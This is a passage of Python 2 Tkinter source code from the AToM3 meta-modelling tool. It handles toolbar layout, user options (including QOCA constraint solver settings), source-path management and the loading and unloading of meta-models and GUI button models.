self.toolBarCanvasHandler = self.toolBarCanvas.create_window(0,0,
window=self.toolBar, anchor=NW )
# This image is displayed in the TOP-Left of AToM3 at all times, also triggers old menu system
self.mainLogoPhotoimage = Embedded_Images().getMainLogo()
# self.atom3MenuButton = Button(self.toolBarFrame,
# image=self.mainLogoPhotoimage, bg="white", fg="white",
# command=lambda s=self,e=None: s.UI_Statechart.event("Options",e))
def handler():
if(self.optionsDatabase.showOptionsDatabase()):
self.loadImmediateOptions()
self.atom3MenuButton = Button(self.toolBarFrame,
image=self.mainLogoPhotoimage, bg="white", fg="white",
command=handler)
#command=lambda s=self: toggleMainToolMenu(s) )
self.atom3MenuButton.pack( side=LEFT,fill=Y )
def handler( event, button = self.atom3MenuButton ):
button.configure( bg='DarkOrchid4', activebackground='SpringGreen',
borderwidth=2, relief='groove' )
self.atom3MenuButton.bind( '<Enter>', handler)
def handler( event, button = self.atom3MenuButton ):
button.configure( bg='white', activebackground='white',
borderwidth=2, relief='raised' )
self.atom3MenuButton.bind( '<Leave>', handler)
self.toolBarFrame.pack( side=TOP, fill=X, expand=0)
self.toolBarCanvas.scrollX.pack(side = LEFT, fill=X, expand=1)
self.toolBarCanvas.square.pack(side = RIGHT, fill=X, expand=0)
#self.toolBarBottomFrame.pack(side = BOTTOM,fill=BOTH, expand=1)
#self.toolBarCanvas.pack(side = LEFT,fill=BOTH, expand=1)
#self.toolBarCanvas.scrollY.pack(side = LEFT,fill=Y, expand=0)
self.configureToolbar()
def configureToolbar( self, event=None ):
"""
Packs the toolbar. Scrollbars are packed only if needed. Scroll region
is set to just big enough to see everything.
"""
# This is the width, height that the toolbar is using 'virtually'
vx = self.toolBar.winfo_width()
vy = self.toolBar.winfo_height()
# This is the width,height that the toolbar is actually getting on screen
ax = self.toolBarCanvas.winfo_width()
ay = self.toolBarFrame.winfo_height()
xScroll = False
yScroll = False
useScrollbarY = bool( self.optionsDatabase.get(self.TOOLBAR_HEIGHT) )
if( useScrollbarY and vy > ay + 10 ): yScroll = True
if( vx > ax + 10 ): xScroll = True
# Configure the scrollable region
self.toolBarCanvas.configure( scrollregion = (0,0,vx,vy ) )
if( useScrollbarY ):
self.toolBarCanvas.configure( height=self.optionsDatabase.get(self.TOOLBAR_HEIGHT) )
else:
self.toolBarCanvas.configure( height=vy )
# What was previously packed... shall be forgotten!
self.toolBarCanvas.pack_forget()
self.toolBarBottomFrame.pack_forget()
self.toolBarCanvas.scrollY.pack_forget()
# Pack it all anew
if( xScroll ): self.toolBarBottomFrame.pack(side = BOTTOM,fill=X, expand=1)
self.toolBarCanvas.pack(side = LEFT,fill=X, expand=1)
if( yScroll ): self.toolBarCanvas.scrollY.pack(side = LEFT,fill=Y, expand=0)
def disableSnapGridForPrinting( self, flag=False):
""" Turns the SnapGrid on/off for printing/postscript """
SnapGrid.applyLayout( self, disableForPrinting = flag )
def toggleSnapGrid(self):
""" Quick way of toggling the Snap Grid on off """
if( self.snapGridInfoTuple ):
SnapGrid.applyLayout(self,disableForPrinting=True)
self.snapGridInfoTuple = None
else:
SnapGrid.applyLayout(self)
self.parent.update_idletasks()
def setupOptionDatabase( self ):
"""
Options Dictionary, save/load/dialog configuration
Default values are used if the database cannot be loaded
The database is saved/overwritten whenever the user presses "Ok"
"""
# Instantiate the Option Database module
self.optionsDatabase = OptionDatabase(self.parent,'Options_AToM3.py', 'AToM3 Options Configuration')
# Local methods/variables with short names to make things more readable :D
newOp = self.optionsDatabase.createNewOption
BE = OptionDialog.BOOLEAN_ENTRY
FE = OptionDialog.FILE_ENTRY
NE = OptionDialog.NO_ENTRY
IE = OptionDialog.INT_ENTRY
LFE = OptionDialog.LIST_FILE_ENTRY
SEP = OptionDialog.SEPERATOR
SE = OptionDialog.STRING_ENTRY
# Create New Options
# Format: OptionKey, defaultValue, valueType, promptString, helpString
# valueType = [ fileTypeCode, buttonLabel, fileType ]
# valueType = [ colorTypeCode, buttonLabel ]
# valueType = [ TypeCode ]
userAreaPath = os.path.split( USER_MODEL_PATH )[0]
newOp( self.STATIC_MENUBAR, False, BE ,"Enable top menubar", """
A static toolbar on the top of the window like many applications have.
This is legacy code from the 0.2 AToM3 version series.
It lacks many of the items present in the dynamically created popup-menus!
WARNING: Not recommended simply because it's missing so much... if you are
interested in upgrading it, please see StaticMenus.py, popupMenuElements.py,
and popupMenuCreator.py files in atom3/kernel/UserInterface/
""" )
newOp( self.EXTRA_CONSOLES, False, BE, "Enable debugging consoles", """
These consoles can allow you to query the state of variables & run methods at
run-time.
These consoles are legacies of the 0.2 AToM3 version series.
WARNING: They are a bit buggy...
""")
newOp( self.FULLSCREEN, False, BE, "Start AToM3 in fullscreen", """
This option is equivelent to starting AToM3 in Windowed mode and then maximizing
the window to occupy the entire screen.
WARNING: May not work on all platforms. Works on Windows though! :) """ )
newOp( self.GEN_GRAPHICS, True, BE ,"Generate graphics",
"If disabled, AToM3 will not be able to open models containing graphics" )
newOp( self.SMOOTH_ARROWS, True, BE ,"Smooth arrows by default",
"If enabled, new arrows will be drawn smooth." )
newOp('line1','',SEP,'','' )
newOp( self.UI_BEHAVIOR_MODEL,
'',
[ FE, "Choose UI Model",[("Python File", "*.py")],
OptionDialog.FILEPATH, userAreaPath ],
"UI Behavior Model",
"Choose the statechart GUI behavior model you wish to use with AToM3\n\n"
+"Hint: the current model is located in:\n"
+"atom3/Kernel/UserInterface/defaultUI_Statechart/UI_Statechart_MDL.py\n"
+"\nSo you can simple load this up, then save it in the UserArea and"
+" modify it there.\n"
+"When done, Generate DES, and choose Compile with the Tkinter option\n"
+"Now you just need to point this here option to the compiled statechart"
+"\n\nNOTE: The class name of your statechart must be 'UI_Statechart_MDL'")
newOp( self.UI_KEYBINDS,
'',
[ FE, "Choose UI Keybinds",[("Python File", "*.py")],
OptionDialog.FILEPATH, userAreaPath ],
"UI Keybindings",
"This allows you to choose a customized keybinding file for use"
+" with AToM3.\n"
+"ie. You can copy the KeyBinds.py file in the Kerenl.UserInterface"
+"\ndirectory to the user area, modify it, then tell AToM3 to load"
+"\nit here, instead of the default one." )
# The Formalisms to have open...
newOp( self.OPEN_FORMALISMS, [],
[LFE, "Choose File",[("Meta-Model","*_META.py"),
("Python File", "*.py")],
OptionDialog.FILENAME_ONLY, META_MODEL_PATH ],
'Multi-Formalism Environment', """
Set which formalisms/meta-models you want AToM3 to START with by default.
All new formalisms can be found by the *_META.py extension, for old formalisms
you'll need to hunt and peck until you find the correct *.py file.
NOTE: This is overriden if you start atom3.py with arguments...
Example 1:
atom3.py CD_ClassDiagramsV3
This opens the formalism CD_ClassDiagramsV3_META.py
Example 2:
atom3.py D:\atom3\Kernel\UserInterface\defaultUI_Statechart\UI_Statechart_MDL.py
This opens all the formalisms needed for the model file. The model file must
have the _MDL.py extension or it will not be recognized. Spaces are allowed in
the path (the script atom3.py can put it together again), but make sure the path
is absolute, that is that it starts with a drive letter (for Windows users).
""")
# newOp( self.GG_CODE_GEN, '',
# [ FE, "Choose Grammar", [("Grammar File", "*_GG_exec.py"),
# ("Python File", "*.py")],
# OptionDialog.FILENAME_ONLY, userAreaPath ],
# "Button Grammar (Obsolete)", """
# When generating formalisms from meta-models, a grammar will automatically
# generate a button for each entity.
#
# UPDATE: In the Feb, 2006 version of AToM3 0.3 button generation grammars were
# removed from AToM3.
# """)
# Yeah, like we really need this:
# newOp( self.CODE_GEN_DIR, '',
# [ FE, "Choose Directory",[("Choose any file in directory", "*")],
# OptionDialog.RELATIVE_DIRNAME, userAreaPath ],
# "Directory for Code Generation",
# "Must be in the SourceCode or MetaModel subdirectories of AToM3\n\n"+
# "Note: Denis is trying to phase this thing out and use the path of the current open ER model instead." )
newOp( self.LASTOPEN_MODEL, [], NE, '' ) # List of open models
newOp( self.LASTOPEN_MMODEL, [], NE, '' ) # List of open meta-models
newOp( self.LAST_INITIAL_DIRS, [], NE, '' ) # Initial directories
newOp( self.SOURCE_PATHS, [], NE, '' ) # Paths to source code...
newOp('line2','',SEP,'','' )
newOp( self.UNDO_ENABLED, False, BE, "Enable Undo (Not recommended)", """
WARNING: Undo is not supported anymore. Undo CAN create unhandled exceptions!
Enabled (and working), it simply saves and loads the model (which is slow).
Part of the problem is that it does not save the model after each change.
Why no working undo? Because it was not built-in to AToM3 originally!
Adding it in afterwards is like putting a broken egg back together :p""")
newOp( self.UNDO_MODS_PER_SAVE, 0, IE, "Modifications per undo", "Saves the model every X modfications to provide undo ability" )
newOp( self.UNDO_DEPTH, 20, IE, "Maximum undo depth", "When maximum undo depth reached, old undo files are overwritten" )
newOp( self.TOOLBAR_HEIGHT, 0, IE, "Toolbar height",
"How many pixels high the toolbar will be\n\n"+
"If the value \"0\" is set, the toolbar will always be just high enough\n"+
"Otherwise, if the height is set too low, scrolling in Y will be necessary" )
newOp( self.BUTTONS_PER_ROW, 12, IE, "Buttons per row",
"Maximum buttons a meta-model can display on a single row\n"+
"Additional rows will be added to fit extra buttons\n\n"+
"If the value \"0\" is set, the per meta-model defaults will be used\n\n"+
"This option only takes effect when openning new meta-models" )
newOp('line3','',SEP,'','' )
labelOpts = [OptionDialog.LABEL,"Times 12","red", "left" ]
connOpts = [OptionDialog.ENUM_ENTRY, "Pipe", "TCP/IP"]
solverOpts = [OptionDialog.ENUM_ENTRY, "Cassowary", "Equality", "Inequality" ]
optionList = [OptionDialog.SINGLE_LIST_ENTRY,
'Enable QOCA constraint solver', True, BE,
'If disabled, layout will not function correctly for some formalisms',
'Enable QOCA auto-solve', True, BE,
'Certain events trigger a re-solve automatically',
'QOCA solver type', "Cassowary", solverOpts,
'The various solver types use different metrics...',
'QOCA connection type', "Pipe", connOpts,
'Pipe connection automatically starts a the QOCA java jar'
+' file\nTCP/IP requires manually starting the QOCA java'
+' jar server',
'QOCA server IP', '127.0.0.1', SE,
'IP address string if using TCP/IP connection mode',
'QOCA server port', 14059, IE,
'Port address integer if using TCP/IP connection mode',
'\nNote 1: Changes will take effect on AToM3 restart only'
+'\nNote 2: Pipe option assumes Java is in environment'
+' path', None,labelOpts,'',
]
newOp( self.QOCA_OPTIONS, [[False, True, "Cassowary", "Pipe",
'127.0.0.1', 14059, None]],
optionList, 'QOCA options',
'QOCA is an incremental constraint solver used for graphic layout')
# Load the options from the file, on failure the defualts will be returned.
self.optionsDatabase.loadOptionsDatabase()
self.loadImmediateOptions( initilizationRunOnly = True )
def loadImmediateOptions(self, initilizationRunOnly = False ):
""" Instead of waiting for AToM3 restart, applies option changes immediately """
def relativeToAbsolutePath( pathDir ):
""" Converts a relative path to an absolute path in the ATOM3 context """
# Is it already absolute?
if( os.path.exists( pathDir ) ):
return pathDir
# Try in the User/Formalisms path
p = os.path.join( USER_MMODEL_PATH, pathDir )
if( os.path.exists( p ) ):
return p
# Try in the Formalisms path
p = os.path.join( META_MODEL_PATH, pathDir )
if( os.path.exists( p ) ):
return p
# Try in the source code path (kernel)
p = os.path.join( SOURCE_CODE_PATH, pathDir )
if( os.path.exists( p ) ):
return p
return ''
self.genGraphics = self.optionsDatabase.get(self.GEN_GRAPHICS)
self.GGforCodeGen = '' # self.optionsDatabase.get(self.GG_CODE_GEN)
self.codeGenDir = USER_MMODEL_PATH #self.optionsDatabase.get(self.CODE_GEN_DIR)
#self.codeGenDir = relativeToAbsolutePath( self.codeGenDir )
# openFormalismsList is a misleading name, what it really is:
# A list of Formalisms in the Options to be openned when AToM3 starts
self.openFormalismsList = self.optionsDatabase.get(self.OPEN_FORMALISMS)
# Show Debugging Consoles?
if( self.optionsDatabase.get(self.EXTRA_CONSOLES) ):
if( initilizationRunOnly ):
self.console = Console(self)
self.debugConsole = DebugConsole(self)
else:
self.showConsole()
else:
if( not initilizationRunOnly ):
self.console.destroy()
self.debugConsole.destroy()
self.console = NoConsole(self)
self.debugConsole = NoConsole(self)
# Setup Initial Directories (for convenience)
self.initialDirectoryDict = self.optionsDatabase.get(self.LAST_INITIAL_DIRS)
if( not self.initialDirectoryDict ):
self.initialDirectoryDict = dict()
self.initialDirectoryDict[ 'OpenSaveModel' ] = MODEL_PATH
self.initialDirectoryDict[ 'OpenMetaModel' ] = META_MODEL_PATH
self.initialDirectoryDict[ 'OpenSaveTrans' ] = ""
self.initialDirectoryDict[ 'Documentation' ] = os.path.split( USER_MMODEL_PATH )[0]
# Load UI Behavior Statechart, and Keybinds
# Generates: self.UI_Statechart and self.createBindingsMethod
loadBehaviorModelOption(self, initilizationRunOnly)
loadKeybindsOption(self, initilizationRunOnly)
#todo: qoca
if(initilizationRunOnly):
qocaOptList = self.optionsDatabase.get(self.QOCA_OPTIONS)[0]
# If QOCA is enabled
if(qocaOptList[0]):
# If automatic re-solve is enabled
self.qocaAutosolve = qocaOptList[1]
solverTypeMap = {"Cassowary":SOLVER_CASS, "Equality":SOLVER_EQ,
"Inequality":SOLVER_INEQ}
solverType = solverTypeMap[qocaOptList[2]]
usePipe = (qocaOptList[3] == "Pipe")
command='java -jar "' + QOCAPATH + '"' # Java in environment path!
ip = qocaOptList[4]
port = qocaOptList[5]
self.qocaSolver = QocaSolver(usePipe, command, ip, port, solverType)
# QOCA disabled... implementation free interface presented
else:
self.qocaAutosolve = False
self.qocaSolver = QocaSolverAbstract()
try:
self.qocaSolver.connect()
except:
tkMessageBox.showinfo( "Could not start QOCA solver",
"See console for more details...",parent = self)
# If AToM3 is just starting, QUIT
if( initilizationRunOnly ): return
self.undoer.setUndoParameters( self.optionsDatabase.get(self.UNDO_ENABLED),
self.optionsDatabase.get(self.UNDO_DEPTH),
self.optionsDatabase.get(self.UNDO_MODS_PER_SAVE) )
# Show the top menu bar?
toggleMainToolMenu( self,
setState=self.optionsDatabase.get( self.STATIC_MENUBAR ) )
# Update the toolbar height
self.configureToolbar()
def historyManager( self, historyKey, newFilename ):
""" Adds the new filename to the options database at historyKey """
historyFiles = self.optionsDatabase.get( historyKey )
# Optimize the file history by removing models that no longer exist
optimizedList = []
for historyFile in historyFiles:
if( os.path.exists( historyFile ) ): optimizedList.append( historyFile )
# File is already there! Remove it (we want most recent on top)
if( newFilename in optimizedList ):
optimizedList.remove( newFilename )
# Add the new file to list
optimizedList = [newFilename] + optimizedList
# Cap the history depth
if( len( optimizedList ) > self.FILE_HISTORY_DEPTH ):
optimizedList = optimizedList[:-1]
# Set & save :D
self.optionsDatabase.set(historyKey, optimizedList)
self.optionsDatabase.saveOptionsDatabase()
"""
Bridge to the connection drawing module
Otherwise older models would become incompatible :-(
Note: I had to relabel them with a "Bridge" in their names, because of name
clashes.
"""
def drawConnections(self, * listOfConnections ):
drawConnectionsBridge(self, * listOfConnections )
def showConnection( self, *args ):
return showConnectionBridge( self, *args )
def sourcePathOptionSave(self, showDialog = True ):
""" Saves the model paths to the option database """
# Gets paths that are in one of the two Formalisms directories
paths = []
for pathName in sys.path:
pathName = os.path.normpath( pathName )
if( os.path.commonprefix( [META_MODEL_PATH, pathName] ) == META_MODEL_PATH ):
paths.append( pathName )
elif(os.path.commonprefix( [USER_MMODEL_PATH, pathName] ) == USER_MMODEL_PATH ):
paths.append( pathName )
# No point saving if nothing has changed
if( paths == self.optionsDatabase.get(self.SOURCE_PATHS) ):
return
if( showDialog ):
myText = ''
myText += 'Save source paths\n'
myText += 'If not saved, path modifications will be lost when AToM3 is restarted'
dialog = Dialog.Dialog(None, {'title': "Source Paths",
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Save','Don\'t Save')})
if( dialog.num == 1 ): return
self.optionsDatabase.set(self.SOURCE_PATHS, paths)
self.optionsDatabase.saveOptionsDatabase()
def sourcePathOptionLoad(self):
""" Loads the model paths from the option database """
paths = self.optionsDatabase.get(self.SOURCE_PATHS)
for path in paths:
path = os.path.normpath( path )
if( path not in sys.path ):
sys.path.append( path )
def sourcePathManager(self, actionCode=0 ):
# Add new source path
if( actionCode == 0 ):
try:
dir = tkFileDialog.askdirectory(
title="Add source path",
initialdir=USER_MMODEL_PATH )
except:
dir = tkFileDialog.askopenfilename(
title="Add source path",
filetypes=[("Choose any file in model directory", "*")],
initialdir=USER_MMODEL_PATH )
if( dir ):
dir = os.path.split( dir )[0]
if( dir == '' ): return # Cancel
self.checkInSearchPath( dir )
# Did the added path create conflicts? If so, should we save it anyway? Probably...
if( self.sourcePathConflictAwareness() ):
return self.sourcePathOptionSave()
# Add more paths...
myText = 'If not saved, they will be lost on AToM3 exit'
dialog = Dialog.Dialog(None, {'title': "Adding Source Paths",
'text': myText,
'bitmap': '',
'default': 1,
'strings': ('Save & Close','Close', 'Add more paths')})
# Quit & save new paths
if( dialog.num == 0 ):
return self.sourcePathOptionSave( showDialog = False )
# Quit & dont' save
if( dialog.num == 1 ):
return
# Keep adding paths
if( dialog.num == 2 ):
return self.sourcePathManager(0)
# Remove source path
elif( actionCode == 1 ):
# Make a list of all the loaded meta-model paths
paths = []
indexMap = dict()
i = 0
j = 1
normModelPath = os.path.normpath( META_MODEL_PATH )
normUserModelPath = os.path.normpath( USER_MMODEL_PATH )
for loadedPath in sys.path:
normLoadedPath = os.path.normpath( loadedPath )
# The loaded path and the model path have the model path in common
# Therefore this is a model path that can be safely removed
if( os.path.commonprefix( [ normLoadedPath,normModelPath ] ) == normModelPath ):
paths.append( normLoadedPath )
indexMap[j] = i
j += 1
elif( os.path.commonprefix( [ normLoadedPath,normUserModelPath ] ) == normModelPath ):
paths.append( normLoadedPath )
indexMap[j] = i
j += 1
i += 1
# Let the user chose the index of the path to remove
title = 'Path Removal Menu'
actionLabel = 'Remove'
index = self.popupMenuCreator.listChoicePopup(title, paths,actionLabel )
# Quit the menu
if( index == 0 ): return self.sourcePathOptionSave()
# Delete the path at index
del sys.path[ indexMap[index] ]
# Delete more menu items...
return self.sourcePathManager(1)
# Source path conflict finder
elif( actionCode == 2 ):
if( not self.sourcePathConflictAwareness() ):
tkMessageBox.showinfo( "Source Path Conflicts","None found.",parent = self)
# Help
else:
tkMessageBox.showinfo(
"Source Path Help",
"Some AToM3 models require the source path to other models\n"+
"Unfortunately, they simply assume that the source path is available to them\n"+
"Since there is no simple way to automatically add these paths, it is up to the user to do this.\n"+
"\nWARNING: When loading extra source paths, you may end up with duplicate source files!\n"+
"If this happens you will be explicitly warned and shown which files are duplicated.\n"
,parent = self)
def sourcePathConflictAwareness(self, showDialog=True, printToConsole=True ):
"""
Finds potential problems arising from multiple files with same name in
directories that have been simultaneously loaded.
"""
# Get the AToM3 base path, and the paths of all its loaded subdirectories
atom3Pattern = re.compile( '.*' + os.path.split( BASE_PATH )[1] )
sourcePaths = []
for pathname in sys.path:
if( atom3Pattern.search( pathname ) ):
sourcePaths.append( os.path.normpath( pathname ) )
# Find all duplicated files
sourceFileDict = dict()
ingoreFilenameList = ['__init__.py', 'ByteCodeCleaner.py']
duplicateSourceFileList = []
for dir in sourcePaths:
if( not os.path.exists(dir) ): continue
for fileName in os.listdir(dir):
pathName = os.path.join(dir,fileName)
# Ignore directories
if( os.path.isdir(pathName) ): continue
# Ignore __init__.py files
elif( fileName in ingoreFilenameList ): continue
# File without a duplicate
elif( not sourceFileDict.has_key( fileName) ):
sourceFileDict[ fileName ] = pathName
# Source file with a duplicate
else:
splitName = string.split( str(fileName), '.' )
if( splitName and len(splitName) > 1 and splitName[1] == 'py' ):
duplicateSourceFileList.append( (sourceFileDict[ fileName ],pathName) )
# Show warning if duplicates occured
if( duplicateSourceFileList ):
from filecmp import cmp
safeDuplicationString = ""
dangerousDuplicationString = ""
for file1,file2 in duplicateSourceFileList:
# Do the files have identical implementations?
if( cmp( file1, file2 ) ):
safeDuplicationString += "i) " + str(file1) + "\n" + "ii) " + str(file2) + "\n\n"
#safeDuplicationString += "Identical source pair (safe):\n" + \
# str(file1) + "\n" + str(file2) + "\n\n"
else:
dangerousDuplicationString += "i) " + str(file1) + "\n" + "ii) " + str(file2) + "\n\n"
#dangerousDuplicationString += "Different implementation source pair (dangerous):\n" + \
# str(file1) + "\n" + str(file2) + "\n\n"
if( safeDuplicationString ):
if( showDialog ):
if( len( safeDuplicationString ) < 300 ):
tkMessageBox.showwarning( "Safe Source Path Conflicts",safeDuplicationString,parent = self)
else:
tkMessageBox.showwarning( "Safe Source Path Conflicts",
safeDuplicationString[:300] + '\n\nSee console for more...\n',parent = self)
if( printToConsole ):
print "***********************************************************\n"
print "Safe Source Path Conflict Detected (Source files with ",
print "same implementation pairs and AToM3 cannot know which ",
print "to use)\n\n", safeDuplicationString
print "***********************************************************\n"
if( dangerousDuplicationString ):
if( showDialog ):
if( len( dangerousDuplicationString ) < 300 ):
tkMessageBox.showwarning( "Dangerous Source Path Conflicts",dangerousDuplicationString,parent = self)
else:
tkMessageBox.showwarning( "Dangerous Source Path Conflicts",
dangerousDuplicationString[:300] + '\n\nSee console for more...\n',parent = self)
if( printToConsole ):
print "***********************************************************\n"
print "Dangerous Source Path Conflict Detected (Source files with ",
print "different implementation pairs and AToM3 cannot know which ",
print "to use)\n\n", dangerousDuplicationString
print "***********************************************************\n"
return True
else:
return False
def addDirectoryWithModelName(self, modelName, noWarning = False ):
"""
Given just a model name, finds the model directory & adds it to path
Returns True on success, False on failure.
Created June 24,2004 by Denis Dube
"""
#noWarning = False
def findModelInPath( modelName, basePath ):
# Find all the model paths that potentially contain the model
modelDirList = []
for dirName in os.listdir(basePath):
if( os.path.isdir( os.path.join( basePath,dirName) ) ):
modelDirList.append(dirName)
# Searches through all the potential model paths, adds model if found
for modelDirName in modelDirList:
for fileName in os.listdir(os.path.join(basePath,modelDirName)):
if( modelName == fileName ):
modelSysPath = os.path.join(basePath,modelDirName)
self.checkInSearchPath( modelSysPath )
return True
return False
# Model could be in the meta model directory or source code directory
if( findModelInPath(modelName+'.py',USER_MMODEL_PATH ) ): return True
if( findModelInPath(modelName+'.py',META_MODEL_PATH ) ): return True
if( findModelInPath(modelName+'.py',SOURCE_CODE_PATH ) ): return True
# What if it's not found?
# That means its not in an immediate subfolder of AToM3.
# In that case I should probably give an error message...
if( not noWarning ):
if(len(modelName) > 10 and modelName[-10:] == '_META_META'):
modelName = modelName[:-5]
title = "ERROR in addDirectoryWithModelName() of: " + __file__
msg = "The formalism "+modelName+" could be found in neither of:\n\n" + \
META_MODEL_PATH + "\n\n" +SOURCE_CODE_PATH+"\n\n"+USER_MMODEL_PATH \
+ '\n\n'
msg += '\nExamples (for the X formalism):\n'
msg += ' Valid: ~\User Formalisms\X\X_META.py\n'
msg += ' Valid: ~\User Formalisms\Foobar\X_META.py\n'
msg += ' Invalid: ~\User Formalisms\X_META.py\n'
msg += ' Invalid: ~\User Formalisms\X\X\X_META.py\n'
msg += ' Invalid: C:\X_META.py'
print title
print msg
tkMessageBox.showerror(title, msg, parent=self)
#self.debug()
#raise Exception
return False
def configureUserActions(self):
"""
Fills the common actions for all formalisms...
"""
def doNaught(*args): pass
self.userActionsMap[self.IDLEMODE] = doNaught
self.userActionsMap[self.INSERTModel] = self.createNew_Model
self.userActionsMap[self.EXPANDModel] = self.expandModel
self.userActionsMap[self.SELECTgraph] = self.selectGraph
def closeMetaModel(self):
"""
Presents a window that shows the open metamodels,
allow to check some of them to be deleted
"""
# The old way of doing things...
if( 0 ):
numMetaModels = len(self.openMetaModels.getValue())
cm = ATOM3TypeDialog(self, self.openMetaModels) # Select the meta-model to delete
if cm.result_ok: # The user pressed Ok
self.removeMetaModels(numMetaModels)
self.putMetaModelName()
# The popup way...
else:
models = self.openMetaModels.getValue()
numMetaModels = len( models )
# Create list of strings for the popup, add a cancel option...
stringList = []
for model in models:
stringList.append( model.getValue() )
# Popup/Dialog config
title = 'Meta-Model Menu'
actionLabel = 'Remove'
# Subtract 1 from index, since added a Cancel button
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel ) - 1
if( index < 0 or index > numMetaModels ): return
# Delete delete delete...
self.openMetaModels.deleteItem( index )
self.removeMetaModels( numMetaModels )
self.putMetaModelName()
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
def putMetaModelName(self):
""" Updates the name of the current meta model and presents it in the Windows title bar """
mmodels = self.openMetaModels.getValue()
name = ""
if len(mmodels) > 0:
counter = 0
for mm in mmodels:
if counter == 0:
name = name + mm.toString()
else:
name = name + " + " + mm.toString()
counter = counter + 1
try:
if name == "":
self.parent.title("AToM3 " + self.VERSION)
else:
self.parent.title("AToM3 "+ self.VERSION + " using: "+name)
except:
pass # Occurs if using AToM3 inside a Tkinter Frame instead of Toplevel window
def removeMetaModels(self, numMetaModels):
"""
Closes one or more of the loaded metamodels (leaves only the present in
self.openMetaModels).
- numMetaModels: is the number of meta-models currently loaded
"""
omm = self.openMetaModels.getValue() # obtain the list of remaining meta-models
somm = [] # list with the meta-models' names
for openmm in omm: # for each ATOM3String...
somm.append(openmm.toString()) # append its value to somm
index, erased = 0, 0
while ( index < numMetaModels-erased ):
# The elements of buttonList are tuples ( <frame>, <formalism name>, <meta-model file>, <button1>, ...)
mm = self.buttonList[index][1] # get the GUI name
trueMM = self.buttonList[index][2] # get the name of the file where the meta-model is stored
dir, fileName = os.path.split(trueMM)
mmName = fileName[:len(fileName)-6] # that must be the name of the meta-model stored in entitiesInMetaModel
if not mm in somm: # It is not in the list, so we have erased it
exec "from ASG_"+mmName+" import ASG_"+mmName+"\n"
anASG = eval("ASG_"+mmName+"(self)")
# Remove the model from sys.path as well, added by Denis Dube, June 25, 2004
if( dir in sys.path and dir not in CRITICAL_PATHS ):
sys.path.remove( dir )
# Remove sys modules loaded with that meta model
pattern = re.compile( "<module '\w*' from '"+mmName+"\w*" )
tmpModules = sys.modules.copy()
for key in tmpModules.keys():
match = pattern.search( str( tmpModules[key] ) )
if( match ): del sys.modules[ key ]
frame2delete = self.buttonList[index][0]
frame2delete.pack_forget() # erase panel from User Interface
# Delete the 'modes' of the buttons that we are to delete...
for idx in range(3, len(self.buttonList[index])): # iterate on the buttons of the meta-model
button2delete = self.buttonList[index][idx] # get the idx-button of the mm
if button2delete in self.modes.keys(): # check if the button has an associated mode
mode2delete = self.modes[button2delete]
del self.userActionsMap[mode2delete] # delete the associated action to that mode
del self.modes[button2delete] # delete that mode
erased = erased + 1 # increment the counter of erased metamodels
self.buttonList.remove(self.buttonList[index]) # remove element from the List
if self.console: self.console.appendText('Closing Meta-Model '+mm)
if mmName in self.entitiesInMetaModel.keys():
for entity in self.entitiesInMetaModel[mmName]: # for each entity defined in the meta-model
del self.CardinalityTable[entity] # delete also the info in CardinalityTable
if entity in self.ConnectivityMap.keys(): del self.ConnectivityMap[entity]
del self.entitiesInMetaModel[mmName]
# Map *_MM classnames to the *_META classnames
metaModelName = self.openGUI_ModelDict[ mmName + '_MM' ]
if( metaModelName[-5:] == '_META' ): metaModelName=metaModelName[:-5]
result = self.ASGroot.unMerge(anASG, metaModelName=metaModelName,
atom3i = self )
if type(result) != IntType:
self.ASGroot = result
else:
index = index+1
if self.openMetaModels.getValue() == []: # no meta-models are left
self.ASGroot.removeContents(self, 1) # clear contents (if any)
self.statusbar.event(StatusBar.MODEL, StatusBar.CLEAR, "Nonamed")
if self.console: self.console.appendText('Clearing model')
self.ASGroot = None
# empty the cardinality tables and the connectivity map.
self.CardinalityTable = {}
self.ConnectivityMap = {}
def loadGUImodel(self, file):
"""
Loads a model of the GUI in the 'Buttons' formalism. Returns this graph.
"""
oldGraphics = self.genGraphics
self.genGraphics = 0 # disble graphics for a while...
if( file in sys.modules.keys()): # file has already been loaded
del sys.modules[file]
#exec "from "+file+" import *\n" in self.__dict__, self.__dict__
exec "import "+file
GUImodelDictionary = eval( file+'.__dict__' )
# Get the AToM3 version that generated the buttons model
if( GUImodelDictionary.has_key( 'atom3version' ) ):
version = GUImodelDictionary[ 'atom3version' ]
else:
version = None
# if we have the meta-model name
if( GUImodelDictionary.has_key( 'loadedMMName' ) ):
self.loadedMMName = GUImodelDictionary[ 'loadedMMName' ]
if( self.loadedMMName == 'Buttons_META' ):
self.loadedMMName = "Buttons"
if self.loadedMMName != "Buttons": # This should be a 'Buttons' model
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+self.metaModelName
+" does not contain a valid formalism (loadedMMName != Buttons)"
+"\n" + self.debug(),
parent = self
)
return
# Create a 'Buttons' root node
from ASG_Buttons import ASG_Buttons
buttonsRoot = ASG_Buttons(self)
del self.loadedMMName
# Do we have a newfunction???
if( GUImodelDictionary.has_key( 'newfunction' ) ):
self.newfunction = GUImodelDictionary[ 'newfunction' ]
else:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model"
+"\nMissing a newfunction method\n" + self.debug()
,parent = self
)
return
# look for newly defined or loaded types (loadedTypes should be a list)
if( GUImodelDictionary.has_key( 'loadedTypes' ) ):
self.genGraphics = 1
self.loadTypes( GUImodelDictionary['loadedTypes'] ) # load the new types...
self.genGraphics = 0
try:
if( version != None ):
self.newfunction(self, buttonsRoot, ButtonsRootNode=buttonsRoot)
else:
self.newfunction(self, buttonsRoot)
except TypeError:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model"
+"\nTypeERROR encountered\n" + self.debug()
,parent = self
)
raise
return
else:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model\n"
+"LoadedMMName not found in dict, import problem...\n"
+ self.debug()
,parent = self
)
return
self.genGraphics = oldGraphics # restore graphics
return buttonsRoot
def openMetaModel(self, GUIModel = None, merge = 1, createNewRoot = 1,
fileName = None, printToConsole=True, printToConsoleIndent=''):
"""
Opens a meta-model, adding the information to the previous ones (if merge == 1). If
GUIModel is None, then opens a dialog box to ask for the name. GUIModel is the name of the
GUI Model to be opened previous to the meta-model.
"""
historyName = None
if( GUIModel == None):
if( not fileName ):
text = "Please choose the starting directory for the file dialog\n"
